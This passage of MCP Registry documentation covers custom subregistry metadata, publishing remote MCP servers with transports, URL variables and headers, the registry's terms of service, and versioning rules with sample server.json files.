The subregistry OpenAPI spec allows subregistries to inject custom metadata via the `_meta` field. For example, a subregistry could inject user ratings, download counts, and security scan results:
```json server.json highlight={17-26} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
],
"_meta": {
"com.example.subregistry/custom": {
"user_rating": 4.5,
"download_count": 12345,
"security_scan": {
"last_scanned": "2025-10-23T12:00:00Z",
"vulnerabilities_found": 0
}
}
}
}
```
We recommend that custom metadata be put under a key that reflects the subregistry (e.g., `"com.example.subregistry/custom"` in the above example).
# Publishing Remote Servers
Source: https://modelcontextprotocol.io/registry/remote-servers
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
The MCP Registry supports remote MCP servers via the `remotes` property in `server.json`:
```json server.json highlight={7-12} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp"
}
]
}
```
A remote server **MUST** be publicly accessible at its specified URL.
## Transport Type
Remote servers can use the Streamable HTTP transport (recommended) or the SSE transport. Remote servers can also support both transports simultaneously at different URLs.
Specify the transport by setting the `type` property of the `remotes` entry to either `"streamable-http"` or `"sse"`:
```json server.json highlight={9,13} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp"
},
{
"type": "sse",
"url": "https://analytics.example.com/sse"
}
]
}
```
## URL Template Variables
Remote servers can define URL template variables using `{curly_braces}` notation. This enables multi-tenant deployments where a single server definition can support multiple endpoints with configurable values:
```json server.json highlight={10-17} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://{tenant_id}.analytics.example.com/mcp",
"variables": {
"tenant_id": {
"description": "Your tenant identifier (e.g., 'us-cell1', 'emea-cell1')",
"isRequired": true
}
}
}
]
}
```
When configuring this server, users provide their `tenant_id` value, and the URL template gets resolved to the appropriate endpoint (e.g., `https://us-cell1.analytics.example.com/mcp`).
Variables support additional properties like `default`, `choices`, and `isSecret`:
```json server.json highlight={12-22} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/multi-region-mcp",
"title": "Multi-Region MCP",
"description": "MCP server with regional endpoints",
"version": "1.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://api.example.com/{region}/mcp",
"variables": {
"region": {
"description": "Deployment region",
"isRequired": true,
"choices": [
"us-east-1",
"eu-west-1",
"ap-southeast-1"
],
"default": "us-east-1"
}
}
}
]
}
```
## HTTP Headers
MCP clients can be instructed to send specific HTTP headers by adding the `headers` property to the `remotes` entry:
```json server.json highlight={11-18} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp",
"headers": [
{
"name": "X-API-Key",
"description": "API key for authentication",
"isRequired": true,
"isSecret": true
}
]
}
]
}
```
## Supporting Remote and Non-remote Installation
The `remotes` property can coexist with the `packages` property in `server.json` in order to allow MCP host applications to choose the preferred method of installation.
```json server.json highlight={7-22} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://email.example.com/mcp"
}
],
"packages": [
{
"registryType": "npm",
"identifier": "@example/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
# Official MCP Registry Terms of Service
Source: https://modelcontextprotocol.io/registry/terms-of-service
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
**Effective date: 2025-09-02**
## Overview
These terms (“Terms”) govern your access to and use of the official MCP Registry (the service hosted at [https://registry.modelcontextprotocol.io/](https://registry.modelcontextprotocol.io/) or a successor location) (“Registry”), including submissions or publications of MCP servers, references to MCP servers or to data about such servers and/or their developers (“Registry Data”), and related conduct. The Registry is intended to be a centralized repository of MCP servers developed by community members to facilitate easy access by AI applications.
These terms are governed by the laws of the State of California.
## For All Users
1. No Warranties. The Registry is provided “as is” with no warranties of any kind. That means we don't guarantee the accuracy, completeness, safety, durability, or availability of the Registry, servers included in the registry, or Registry Data. In short, we’re also not responsible for any MCP servers or Registry Data, and we highly recommend that you evaluate each MCP server and its suitability for your intended use case(s) before deciding whether to use it.
2. Access and Use Requirements. To access or use the Registry, you must:
1. Be at least 18 years old.
2. Use the Registry, MCP servers in the Registry, and Registry Data only in ways that are legal under the applicable laws of the United States or other countries including the country in which you are a resident or from which you access and use the Registry, and not be barred from accessing or using the Registry under such laws. You will comply with all applicable law, regulation, and third party rights (including, without limitation, laws regarding the import or export of data or software, privacy, intellectual property, and local laws). You will not use the Registry, MCP servers, or Registry Data to encourage or promote illegal activity or the violation of third party rights or terms of service.
3. Log in via method(s) approved by the Registry maintainers, which may involve using applications or other software owned by third parties.
3. Entity Use. If you are accessing or using the Registry on behalf of an entity, you represent and warrant that you have authority to bind that entity to these Terms. By accepting these Terms, you are doing so on behalf of that entity (and all references to “you” in these Terms refer to that entity).
4. Account Information. In order to access or use the Registry, you may be required to provide certain information (such as identification or contact details) as part of a registration process or in connection with your access or use of the Registry or MCP servers therein. Any information you give must be accurate and up-to-date, and you agree to inform us promptly of any updates. You understand that your use of the Registry may be monitored to ensure quality and verify your compliance with these Terms.
5. Feedback. You are under no obligation to provide feedback or suggestions. If you provide feedback or suggestions about the Registry or the Model Context Protocol, then we (and those we allow) may use such information without obligation to you.
6. Branding. Only use the term “Official MCP Registry” where it is clear it refers to the Registry, and does not imply affiliation, endorsement, or sponsorship. For example, you can permissibly say “Acme Inc. keeps its data up to date by automatically pulling data from the Official MCP Registry” or “This data comes from the Official MCP Registry,” but cannot say “This is the website for the Official MCP Registry,” “We’re the premier destination to view Official MCP Registry data,” or “We’ve partnered with the Official MCP Registry to provide this data.”
7. Modification. We may modify the Terms or any portion to, for example, reflect changes to the law or changes to the Model Context Protocol. We’ll post notice of modifications to the Terms to this website or a successor location. If you do not agree to the modified Terms, you should discontinue your access to and/or use of the Registry. Your continued access to and/or use of the Registry constitutes your acceptance of any modified Terms.
8. Additional Terms. Depending on your intended use case(s), you must also abide by applicable terms below.
## For MCP Developers
9. Prohibitions. By accessing and using the Registry, including by submitting MCP servers and/or Registry Data, you agree not to:
1. Share malicious or harmful content, such as malware, even in good faith or for research purposes, or perform any action with the intent of introducing any viruses, worms, defects, Trojan horses, malware, or any items of a destructive nature;
2. Defame, abuse, harass, stalk, or threaten others;
3. Interfere with or disrupt the Registry or any associated servers or networks;
4. Submit data with the intent of confusing or misleading others, including but not limited to via spam, posting off-topic marketing content, posting MCP servers in a way that falsely implies affiliation with or endorsement by a third party, or repeatedly posting the same or similar MCP servers under different names;
5. Promote or facilitate unlawful online gambling or disruptive commercial messages or advertisements;
6. Use the Registry for any activities where the use or failure of the Registry could lead to death, personal injury, or environmental damage;
7. Use the Registry to process or store any data that is subject to the International Traffic in Arms Regulations maintained by the U.S. Department of State.
10. License. You agree that metadata about MCP servers you submit (e.g., schema name and description, URLs, identifiers) and other Registry Data is intended to be public, and will be dedicated to the public domain under [CC0 1.0 Universal](https://creativecommons.org/publicdomain/zero/1.0/). By submitting such data, you agree that you have the legal right to make this dedication (i.e., you own the copyright to these submissions or have permission from the copyright owner(s) to do so) and intend to do so. You understand that this dedication is perpetual, irrevocable, and worldwide, and you waive any moral rights you may have in your contributions to the fullest extent permitted by law. This dedication applies only to Registry Data and not to packages in third party registries that you might point to.
11. Privacy and Publicity. You understand that any MCP server metadata you publish may be made public. This includes personal data such as your GitHub username, domain name, or details from your server description. Moreover, you understand that others may process personal information included in your MCP server metadata. For example, subregistries might enrich this data by adding how many stars your GitHub repository has, or perform automated security scanning on your code. By publishing a server, you agree that others may engage in this sort of processing, and you waive rights you might have in some jurisdictions to access, rectify, erase, restrict, or object to such processing.
# Versioning Published MCP Servers
Source: https://modelcontextprotocol.io/registry/versioning
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
MCP servers **MUST** define a version string in `server.json`. For example:
```json server.json highlight={6} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
The version string **MUST** be unique for each publication of the server. Once published, the version string (and other metadata) cannot be changed.
## Version Format
The MCP Registry recommends [semantic versioning](https://semver.org/), but supports any version string format. When a server is published, the MCP Registry will attempt to parse its version as a semantic version string for sorting purposes, and will mark the version as "latest" if appropriate. If parsing fails, the version will always be marked as "latest".
If a server uses semantic version strings but publishes a new version that does *not* conform to semantic versioning, the new version will be marked as "latest" even if it would otherwise be sorted before the semantic version strings.
As an error prevention mechanism, the MCP Registry prohibits version strings that appear to refer to ranges of versions.
| Example | Type | Guidance |
| -------------- | ------------------- | ------------------------------ |
| `1.0.0` | semantic version | **Recommended** |
| `2.1.3-alpha` | semantic prerelease | **Recommended** |
| `1.0.0-beta.1` | semantic prerelease | **Recommended** |
| `3.0.0-rc.2` | semantic prerelease | **Recommended** |
| `2025.11.25` | semantic date | Recommended |
| `2025.6.18` | semantic date | Recommended **(⚠️Caution!⚠️)** |
| `2025.06.18` | non-semantic date | Allowed **(⚠️Caution!⚠️)** |
| `2025-06-18` | non-semantic date | Allowed |
| `v1.0` | prefixed version | Allowed |
| `^1.2.3` | version range | Prohibited |
| `~1.2.3` | version range | Prohibited |
| `>=1.2.3` | version range | Prohibited |
| `<=1.2.3` | version range | Prohibited |
| `>1.2.3` | version range | Prohibited |
| `<1.2.3` | version range | Prohibited |
| `1.x` | version range | Prohibited |
| `1.2.*` | version range | Prohibited |
| `1 - 2` | version range | Prohibited |
| `1.2 \|\| 1.3` | version range | Prohibited |
## Best Practices
### Use Semantic Versioning
Use [semantic versioning](https://semver.org/) for version strings.
### Align Server Version with Package Version
For local servers, align the server version with the underlying package version in order to prevent confusion:
```json server.json highlight={2,7} theme={null}
{
"version": "1.2.3",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.2.3",
"transport": {
"type": "stdio"
}
}
]
}
```
If there are multiple underlying packages, use the server version to indicate the overall release version:
```json server.json highlight={2,7,15} theme={null}
{
"version": "1.3.0",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.3.0",
"transport": {
"type": "stdio"
}
},
{
"registryType": "nuget",
"identifier": "MyUsername.MyServer",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Align Server Version with Remote API Version
For remote servers with an API version, the server version should align with the API version:
```json server.json highlight={2,6} theme={null}
{
"version": "2.1.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://api.myservice.com/mcp/v2.1"
}
]
}
```
### Use Prerelease Versions for Registry-only Updates
If you anticipate publishing a server multiple times *without* changing the underlying package or remote URL — for example, to update other parts of the metadata — use semantic prerelease versions:
```json server.json highlight={2} theme={null}
{
"version": "1.2.3-1",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.2.3",
"transport": {
"type": "stdio"
}
}
]
}
```
According to semantic versioning, prerelease versions such as `1.2.3-1` are sorted before regular semantic versions such as `1.2.3`. Therefore, if you publish a prerelease version *after* its corresponding regular version, the prerelease version will **not** be marked as "latest".
## Aggregator Recommendations
MCP Registry aggregators **SHOULD**:
1. Attempt to interpret versions as semantic versions when possible
2. Use the following version comparison rules:
* If one version is marked as "latest", treat it as later
* If both versions are valid semantic versions, use semantic versioning comparison rules
* If neither versions are valid semantic versions, compare published timestamp
* If one version is a valid semantic version and the other is not, treat the semantic version as later